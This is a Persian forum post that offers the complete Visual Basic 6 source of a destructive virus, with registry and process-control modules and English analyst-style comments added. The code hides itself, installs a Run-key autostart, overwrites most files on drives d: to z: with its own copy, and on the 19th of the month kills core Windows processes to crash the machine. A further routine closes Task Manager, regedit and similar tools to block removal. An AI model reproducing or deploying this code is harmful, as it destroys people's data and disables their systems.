سورس ویروس ساده و در عین حال خطرناک با ویژوال بیسیک
سورس ویروس ساده و در عین حال خطرناک با ویژوال بیسیک
سلام
سورس یه ویروس ساده و در عین حال خطرناک.
این ویروس از زمان اجرا تمام فایل‌ها را خراب می‌کنه و از روز 19 ماه میلادی شروع به ریست کردن یهویی سیستم (روشی جدا از شات‌دان معمولی) می‌کنه.
کد:
Dim man1 As String


' myposhe: walks the entries that Dir returns for sPath (vbDirectory flag set)
' and passes each entry, joined to sPath with a trailing "\", to kharab.
' Analyst note: together with kharab this is the file-damaging payload of the
' sample; it is started from startt once per drive letter.
Sub myposhe(sPath As String)


sdir = Dir(sPath, vbDirectory)
Do Until LenB(sdir) = 0
   Debug.Print sdir
   sdir = Dir
       
          ' hand the sub-path to the overwrite routine
          kharab (sPath + sdir + "\")
         
Loop
End Sub

' kharab: enumerates the names Dir returns for path p and, for every name
' whose last four characters are not ".exe", adds it to List1 and calls
' FileCopy with that name as the DESTINATION, so the target's contents are
' replaced rather than read.
' Analyst note: this is data destruction by overwrite (MITRE ATT&CK T1485).
' Overwritten files are not recoverable from the file itself; offline or
' versioned backups are the practical mitigation. A burst of writes to many
' unrelated documents by one process is the behaviour to alert on.
' manyer is presumably meant to be the program's own path (it is assigned
' only inside startt in the visible code) - confirm before relying on this.
Private Sub kharab(p As String)
sFilename = Dir(p)

Do While sFilename > ""

 Debug.Print sFilename
 sFilename = Dir()
       ' executables are skipped; everything else is used as a copy target
       If (Right(sFilename, 4) <> ".exe") Then
           List1.AddItem (sFilename)
           FileCopy manyer, sFilename
       End If
Loop

End Sub

' winGa: empty stub; it has no body in the posted listing.
Sub winGa()

End Sub

' Command1_Click: empty button handler; no action is attached to the button.
Private Sub Command1_Click()

End Sub

' Form_Load: runs startt as soon as the form is loaded, so the hide,
' self-copy, autorun and file-overwrite steps begin at program start with no
' user interaction.
Private Sub Form_Load()
Call startt
End Sub

' Timer1_Timer: on every tick re-runs startt, then checks a date trigger.
' The trigger fires when the day of the month is 19, or when the saved
' setting ("iran", "mm", "aa") already holds 19 - so once the 19th has been
' seen, the condition stays true on later days as well.
' When triggered it asks EndAnyProcess to terminate four system process
' names; the post text describes the effect as a sudden system reset
' (MITRE ATT&CK T1529).
' Analyst notes:
'  - SaveSetting/GetSetting store under
'    HKCU\Software\VB and VBA Program Settings\<app>\<section>, so the key
'    "iran\mm" with value "aa" = "19" is a host artifact of this sample.
'  - On Error Resume Next hides every failure in this handler.
'  - Process-access or termination attempts against smss.exe / csrss.exe from
'    a user application are a high-confidence detection signal.
Private Sub Timer1_Timer()
On Error Resume Next
Call startt

If (Day(Date) = 19) Or (GetSetting("iran", "mm", "aa", "0") = 19) Then
' persist the trigger so it survives restarts and later dates
Call SaveSetting("iran", "mm", "aa", "19")


Call EndAnyProcess("smss.exe")
Call EndAnyProcess("csrss.exe")
Call EndAnyProcess("system.exe")
Call EndAnyProcess("svchost.exe")


End If



End Sub
' startt: main routine of the sample. In order it
'  1. hides the program (removed from the task list, form hidden and moved),
'  2. builds the full path of the running executable in manyer,
'  3. copies that executable to the path held in man1 and marks the copy
'     Hidden + System (MITRE ATT&CK T1564.001),
'  4. writes man1 into the per-user Run key under the value name "Window"
'     so it starts at logon (T1547.001),
'  5. loops over character codes 100..122 ("d".."z") and calls kharab and
'     myposhe on each "<letter>:\" root.
' Analyst notes:
'  - man1 is a module-level string; the visible listing never assigns it, so
'    the drop location cannot be read off this page.
'  - dt is not assigned anywhere in the visible code.
'  - On Error Resume Next suppresses all errors, so failed steps are silent.
'  - Hunting leads: a Run value named "Window" under
'    HKCU\Software\Microsoft\Windows\CurrentVersion\Run, and an executable
'    carrying both Hidden and System attributes in a user-writable location.
Sub startt()
On Error Resume Next
App.TaskVisible = False
Hide
Top = 10000
Dim mizYer As String
''mizYer = Environ$("USERPROFILE") & "\ali.txt"
''MsgBox mizYer
Dim manyer
manyer = App.Path
Dim llenman As Integer
llenman = Len(manyer)
' a 3-character App.Path is treated as a drive root that already ends in "\"
If llenman = 3 Then
manyer = manyer + App.ExeName + ".exe"
Else
manyer = manyer + "\" + App.ExeName + ".exe"
End If


FileCopy manyer, man1

SetAttr man1, vbHidden + vbSystem

' logon persistence through the per-user Run key
SetStringValue "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Window", man1
'\////////////////
List1.Clear
For Cl = 100 To 97 + 25
     If dt <> 1 Then
        List1.AddItem (Chr(Cl) + ":")
        kharab (Chr(Cl) + ":\")
        myposhe (Chr(Cl) + ":\")
     End If
  Next Cl
End Sub

' Timer2_Timer: launches explorer.exe with normal focus on every tick of
' Timer2. The timer interval is a form property and is not shown on the page.
' Analyst note: explorer.exe being spawned repeatedly by a non-shell parent
' process is an easy process-tree anomaly to alert on.
Private Sub Timer2_Timer()
   Call Shell("explorer.exe", vbNormalFocus)

End Sub


ماژول ها
کد:
Type FILETIME
   lLowDateTime    As Long
   lHighDateTime   As Long
End Type

Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long
Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As Long
Declare Function RegQueryValueExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByRef lpData As Long, lpcbData As Long) As Long
Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Declare Function RegSetValueExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByRef lpData As Long, ByVal cbData As Long) As Long
Declare Function RegSetValueExB Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByRef lpData As Byte, ByVal cbData As Long) As Long

' --- Win32 error codes compared against registry API return values ---
Const ERROR_SUCCESS = 0&
Const ERROR_BADDB = 1009&
Const ERROR_BADKEY = 1010&
Const ERROR_CANTOPEN = 1011&
Const ERROR_CANTREAD = 1012&
Const ERROR_CANTWRITE = 1013&
Const ERROR_OUTOFMEMORY = 14&
Const ERROR_INVALID_PARAMETER = 87&
Const ERROR_ACCESS_DENIED = 5&
Const ERROR_NO_MORE_ITEMS = 259&
Const ERROR_MORE_DATA = 234&

' --- registry value types (dwType argument of RegSetValueEx) ---
Const REG_NONE = 0&
Const REG_SZ = 1&
Const REG_EXPAND_SZ = 2&
Const REG_BINARY = 3&
Const REG_DWORD = 4&
Const REG_DWORD_LITTLE_ENDIAN = 4&
Const REG_DWORD_BIG_ENDIAN = 5&
Const REG_LINK = 6&
Const REG_MULTI_SZ = 7&
Const REG_RESOURCE_LIST = 8&
Const REG_FULL_RESOURCE_DESCRIPTOR = 9&
Const REG_RESOURCE_REQUIREMENTS_LIST = 10&

' --- access-right masks (samDesired argument of RegOpenKeyEx) ---
Const KEY_QUERY_VALUE = &H1&
Const KEY_SET_VALUE = &H2&
Const KEY_CREATE_SUB_KEY = &H4&
Const KEY_ENUMERATE_SUB_KEYS = &H8&
Const KEY_NOTIFY = &H10&
Const KEY_CREATE_LINK = &H20&
Const READ_CONTROL = &H20000
Const WRITE_DAC = &H40000
Const WRITE_OWNER = &H80000
Const SYNCHRONIZE = &H100000
Const STANDARD_RIGHTS_REQUIRED = &HF0000
Const STANDARD_RIGHTS_READ = READ_CONTROL
Const STANDARD_RIGHTS_WRITE = READ_CONTROL
Const STANDARD_RIGHTS_EXECUTE = READ_CONTROL
Const KEY_READ = STANDARD_RIGHTS_READ Or KEY_QUERY_VALUE Or KEY_ENUMERATE_SUB_KEYS Or KEY_NOTIFY
' KEY_WRITE is the mask the Set*Value functions in this module open keys with
Const KEY_WRITE = STANDARD_RIGHTS_WRITE Or KEY_SET_VALUE Or KEY_CREATE_SUB_KEY
Const KEY_EXECUTE = KEY_READ

' --- module-level scratch state shared by every function in this module ---
Dim hKey As Long, MainKeyHandle As Long
Dim rtn As Long, lBuffer As Long, sBuffer As String
Dim lBufferSize As Long
Dim lDataSize As Long
Dim ByteArray() As Byte

'This constant determines whether or not to display error messages to the
'user. I have set the default value to False, as an error message can and
'does become irritating after a while. Set this value to True if you want
'to debug your code when reading from and writing to the system
'registry, as any errors will then be displayed in a message box.

Const DisplayErrorMsg = False


' SetDWORDValue: writes a 4-byte REG_DWORD value.
'   SubKey - full key path starting with a root name such as
'            "HKEY_CURRENT_USER\..."; ParseKey splits it and, because the
'            argument is passed by reference, rewrites it to the remainder.
'   Entry  - value name.
'   Value  - the Long to store.
' No return value is assigned. Failures are silent: the message-box calls
' are commented out and DisplayErrorMsg is False.
' The key must already exist; it is opened with KEY_WRITE, not created.
Function SetDWORDValue(SubKey As String, Entry As String, Value As Long)

Call ParseKey(SubKey, MainKeyHandle)

If MainKeyHandle Then
  rtn = RegOpenKeyEx(MainKeyHandle, SubKey, 0, KEY_WRITE, hKey) 'open the key
  If rtn = ERROR_SUCCESS Then 'if the key was opened successfully then
     rtn = RegSetValueExA(hKey, Entry, 0, REG_DWORD, Value, 4) 'write the value
     If Not rtn = ERROR_SUCCESS Then   'if there was an error writing the value
        If DisplayErrorMsg = True Then 'if the user wants errors displayed
           'msgbox ErrorMsg(rtn)        'display the error
        End If
     End If
     rtn = RegCloseKey(hKey) 'close the key
  Else 'if there was an error opening the key
     If DisplayErrorMsg = True Then 'if the user wants errors displayed
        'msgbox ErrorMsg(rtn) 'display the error
     End If
  End If
End If

End Function



' GetMainKeyHandle: maps a root-key name ("HKEY_CURRENT_USER", ...) to its
' predefined numeric handle.
' Returns 0 (the default for Long) when the name matches none of the cases;
' callers in this module test the result for non-zero before using it.
Function GetMainKeyHandle(MainKeyName As String) As Long

' predefined root-key handles
Const HKEY_CLASSES_ROOT = &H80000000
Const HKEY_CURRENT_USER = &H80000001
Const HKEY_LOCAL_MACHINE = &H80000002
Const HKEY_USERS = &H80000003
Const HKEY_PERFORMANCE_DATA = &H80000004
Const HKEY_CURRENT_CONFIG = &H80000005
Const HKEY_DYN_DATA = &H80000006
 
Select Case MainKeyName
      Case "HKEY_CLASSES_ROOT"
           GetMainKeyHandle = HKEY_CLASSES_ROOT
      Case "HKEY_CURRENT_USER"
           GetMainKeyHandle = HKEY_CURRENT_USER
      Case "HKEY_LOCAL_MACHINE"
           GetMainKeyHandle = HKEY_LOCAL_MACHINE
      Case "HKEY_USERS"
           GetMainKeyHandle = HKEY_USERS
      Case "HKEY_PERFORMANCE_DATA"
           GetMainKeyHandle = HKEY_PERFORMANCE_DATA
      Case "HKEY_CURRENT_CONFIG"
           GetMainKeyHandle = HKEY_CURRENT_CONFIG
      Case "HKEY_DYN_DATA"
           GetMainKeyHandle = HKEY_DYN_DATA
End Select

End Function

' ErrorMsg: intended to translate a registry API error code into a
' human-readable message.
' NOTE(review): every branch assigns to GetErrorMsg, not to the function's
' own name ErrorMsg, so as written the function returns an empty string.
' The only call sites in this module are commented out.
Function ErrorMsg(lErrorCode As Long) As String
   
'If an error does occur, and the user wants error messages displayed, then
'display one of the following error messages

Select Case lErrorCode
      Case 1009, 1015
           GetErrorMsg = "The Registry Database is corrupt!"
      Case 2, 1010
           GetErrorMsg = "Bad Key Name"
      Case 1011
           GetErrorMsg = "Can't Open Key"
      Case 4, 1012
           GetErrorMsg = "Can't Read Key"
      Case 5
           GetErrorMsg = "Access to this key is denied"
      Case 1013
           GetErrorMsg = "Can't Write Key"
      Case 8, 14
           GetErrorMsg = "Out of memory"
      Case 87
           GetErrorMsg = "Invalid Parameter"
      Case 234
           GetErrorMsg = "There is more data than the buffer has been allocated to hold."
      Case Else
           GetErrorMsg = "Undefined Error Code:  " & Str$(lErrorCode)
End Select

End Function



' ParseKey: splits a full registry path into a root handle and a sub-key.
'   Keyname   - in: "HKEY_xxx\sub\key"; out: the part after the first "\"
'               (or "" when only a root name was given).
'   Keyhandle - out: handle from GetMainKeyHandle for the root name.
' Both arguments are modified in place (VB passes by reference by default).
' When the path does not start with "HKEY_" or ends with "\", the procedure
' exits without touching Keyhandle, so a caller sees whatever value the
' variable already held.
Private Sub ParseKey(Keyname As String, Keyhandle As Long)
   
rtn = InStr(Keyname, "\") 'position of the first "\" in Keyname, 0 if none

If Left(Keyname, 5) <> "HKEY_" Or Right(Keyname, 1) = "\" Then 'if the prefix is wrong or there is a "\" at the end of the Keyname then
  'msgbox "Incorrect Format:" + Chr(10) + Chr(10) + Keyname 'display error to the user
  Exit Sub 'exit the procedure
ElseIf rtn = 0 Then 'if the Keyname contains no "\"
  Keyhandle = GetMainKeyHandle(Keyname)
  Keyname = "" 'leave Keyname blank
Else 'otherwise, Keyname contains "\"
  Keyhandle = GetMainKeyHandle(Left(Keyname, rtn - 1)) 'separate the Keyname
  Keyname = Right(Keyname, Len(Keyname) - rtn)
End If

End Sub
' CreateKey: creates the registry key named by SubKey (full path starting
' with a root name) and closes the returned handle.
' No return value is assigned, and a failed RegCreateKey is not reported.
' Not called from the form code shown on this page.
Function CreateKey(SubKey As String)

Call ParseKey(SubKey, MainKeyHandle)

If MainKeyHandle Then
  rtn = RegCreateKey(MainKeyHandle, SubKey, hKey) 'create the key
  If rtn = ERROR_SUCCESS Then 'if the key was created then
     rtn = RegCloseKey(hKey)  'close the key
  End If
End If

End Function
' SetStringValue: writes a REG_SZ value.
'   SubKey - full key path starting with a root name; split by ParseKey.
'   Entry  - value name.
'   Value  - string data to store.
' No return value is assigned and failures are silent (message boxes are
' commented out, DisplayErrorMsg is False).
' Analyst note: startt calls this with the per-user Run key and the value
' name "Window", which makes this function the sample's persistence
' primitive. Registry value-set auditing on the Run keys covers it.
Function SetStringValue(SubKey As String, Entry As String, Value As String)

Call ParseKey(SubKey, MainKeyHandle)

If MainKeyHandle Then
  rtn = RegOpenKeyEx(MainKeyHandle, SubKey, 0, KEY_WRITE, hKey) 'open the key
  If rtn = ERROR_SUCCESS Then 'if the key was opened successfully then
     rtn = RegSetValueEx(hKey, Entry, 0, REG_SZ, ByVal Value, Len(Value)) 'write the value
     If Not rtn = ERROR_SUCCESS Then   'if there was an error writing the value
        If DisplayErrorMsg = True Then 'if the user wants errors displayed
           'msgbox ErrorMsg(rtn)        'display the error
        End If
     End If
     rtn = RegCloseKey(hKey) 'close the key
  Else 'if there was an error opening the key
     If DisplayErrorMsg = True Then 'if the user wants errors displayed
        'msgbox ErrorMsg(rtn)        'display the error
     End If
  End If
End If

End Function

و ماژول دوم
کد:
Private Declare Function GetVersion Lib "kernel32" () As Long
Private Declare Function GetCurrentProcess Lib "kernel32" () As Long
Private Declare Function OpenProcessToken Lib "advapi32" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, TokenHandle As Long) As Long
Private Declare Function LookupPrivilegeValue Lib "advapi32" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, lpLuid As LUID) As Long
Private Declare Function AdjustTokenPrivileges Lib "advapi32" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As Any, ReturnLength As Any) As Long
Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, lpdwProcessId As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessID As Long) As Long
Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal dwFlags As Long, ByVal th32ProcessID As Long) As Long
Private Declare Function Process32First Lib "kernel32" (ByVal hSnapshot As Long, lppe As Any) As Long
Private Declare Function Process32Next Lib "kernel32" (ByVal hSnapshot As Long, lppe As Any) As Long
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long

' --- token access rights and privilege attribute used by GiveMeThatHandle ---
Private Const TOKEN_ADJUST_PRIVILEGES = &H20
Private Const TOKEN_QUERY = &H8
Private Const SE_PRIVILEGE_ENABLED = &H2
' --- process access rights; PROCESS_ALL_ACCESS is what OpenProcess is called with ---
Private Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
Private Const PROCESS_VM_READ = 16
' --- Toolhelp snapshot flags ---
Private Const TH32CS_SNAPHEAPLIST = &H1
Private Const TH32CS_SNAPPROCESS = &H2
Private Const TH32CS_SNAPTHREAD = &H4
Private Const TH32CS_SNAPMODULE = &H8
' not referenced by the procedures visible in this module
Private Const HKEY_CLASSES_ROOT = &H80000000
Private Const TH32CS_SNAPALL = (TH32CS_SNAPHEAPLIST + TH32CS_SNAPPROCESS + TH32CS_SNAPTHREAD + TH32CS_SNAPMODULE)
' Record filled in by Process32First / Process32Next for each process
Private Type PROCESSENTRY32
   dwSize As Long
   cntUsage As Long
   th32ProcessID As Long
   th32DefaultHeapID As Long
   th32ModuleID As Long
   cntThreads As Long
   th32ParentProcessID As Long
   pcPriClassBase As Long
   dwFlags As Long
   szexeFile As String * 260
End Type

' 64-bit locally unique identifier, filled in by LookupPrivilegeValue
Private Type LUID
  lowpart As Long
  highpart As Long
End Type

' Single-entry privilege set passed to AdjustTokenPrivileges
Private Type TOKEN_PRIVILEGES
   PrivilegeCount As Long
   LuidUDT As LUID
   Attributes As Long
End Type

' GiveMeThatHandle: returns a process handle for a process whose image name
' contains ExeName.
' Steps visible in the code:
'  1. Takes a Toolhelp snapshot and walks it with Process32First/Next,
'     lower-casing each image name and keeping the PID of the last entry
'     that contains ExeName.
'  2. Opens the current process token and requests SeDebugPrivilege.
'  3. Calls OpenProcess with PROCESS_ALL_ACCESS on the selected PID and
'     returns that handle.
' On an early failure in step 2 it jumps to CleanUp and returns 0.
' Analyst notes:
'  - A user-mode program enabling SeDebugPrivilege and then requesting
'    PROCESS_ALL_ACCESS to system processes is a strong detection signal
'    (privilege-adjustment auditing, process-access telemetry).
'  - SeDebugPrivilege is normally present only in administrator tokens, so
'    running day-to-day work as a standard user limits what this routine
'    can open.
'  - In "Dim P_Pid, P_Proc, adr, bfLg As Long" only bfLg is typed As Long;
'    the other three are Variants.
Function GiveMeThatHandle(ExeName) As Long
Dim P_Pid, P_Proc, adr, bfLg As Long
Dim res&, ant&
Dim u As Integer
Dim Process As PROCESSENTRY32

res = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0&)

If res <> 0 Then

  Process.dwSize = Len(Process)
  ant = Process32First(res, Process)
  u = 0
 
Do
 A = LCase(Process.szexeFile)
   ' substring match on the lower-cased image name
   If InStr(A, ExeName) Then pids = Process.th32ProcessID
   ant = Process32Next(res, Process)
 u = u + 1
Loop Until ant = 0

End If

P_Pid = pids
hProcessID = P_Pid
DoEvents

   Dim hToken As Long
   Dim hProcess As Long
   Dim tp As TOKEN_PRIVILEGES
   
   ' presumably restricts the privilege step to NT-family Windows - confirm
   If GetVersion() >= 0 Then
       If OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES Or _
           TOKEN_QUERY, hToken) = 0 Then
           GoTo CleanUp
       End If

       If LookupPrivilegeValue("", "SeDebugPrivilege", tp.LuidUDT) = 0 Then
           GoTo CleanUp
       End If

       tp.PrivilegeCount = 1
       tp.Attributes = SE_PRIVILEGE_ENABLED

       If AdjustTokenPrivileges(hToken, False, tp, 0, ByVal 0&, _
           ByVal 0&) = 0 Then
           GoTo CleanUp
       End If
   End If

   P_Proc = OpenProcess(PROCESS_ALL_ACCESS, 0, hProcessID)
   GiveMeThatHandle = P_Proc
CleanUp:
       ' the token handle is released on both the success and failure paths
       If hToken Then CloseHandle hToken
End Function

' EndAnyProcess: obtains a handle through GiveMeThatHandle and passes it to
' TerminateProcess, then closes the handle.
' NOTE(review): the result is stored in Kill_Process, not in the function's
' own name, so callers always receive the default False. The local
' Const PROCESS_ALL_ACCESS = 0 is not used inside this procedure.
' Analyst note: this is the helper behind both the process-kill lists in
' this module and the date trigger in the form's Timer1 handler.
Function EndAnyProcess(ExeName) As Boolean
      Dim phandle As Long
      Const PROCESS_ALL_ACCESS = 0
      phandle = GiveMeThatHandle(ExeName)
      Kill_Process = CBool(TerminateProcess(phandle, uExitCode))
      Call CloseHandle(phandle)
End Function

' Rest_sys: requests termination of the same four system process names that
' the form's Timer1 handler uses for its date trigger.
' It is Private to this module and nothing in the visible module code
' calls it.
Private Sub Rest_sys()

Call EndAnyProcess("smss.exe")
Call EndAnyProcess("csrss.exe")
Call EndAnyProcess("system.exe")
Call EndAnyProcess("svchost.exe")
End Sub

' end_show: requests termination of Registry Editor, Task Manager,
' msconfig, the command prompt, MMC and the Opera browser.
' Analyst note: these are the tools a user would reach for to inspect or
' remove the sample, so this is a remediation-hindering step
' (MITRE ATT&CK T1562.001). No call to end_show appears in the visible
' listing. Admin tools that close immediately after launch are a useful
' triage symptom on an affected host.
Sub end_show()

Call EndAnyProcess("regedit.exe")
Call EndAnyProcess("taskmgr.exe")
Call EndAnyProcess("msconfig.exe")
Call EndAnyProcess("cmd.exe")
Call EndAnyProcess("mmc.exe")
Call EndAnyProcess("opera.exe")
End Sub
(آخرین ویرایش در این ارسال: ۱۱-اسفند-۱۳۹۷, ۱۵:۵۷:۳۴، توسط Ghoghnus.)
۱۱-اسفند-۱۳۹۷, ۱۵:۴۹:۰۴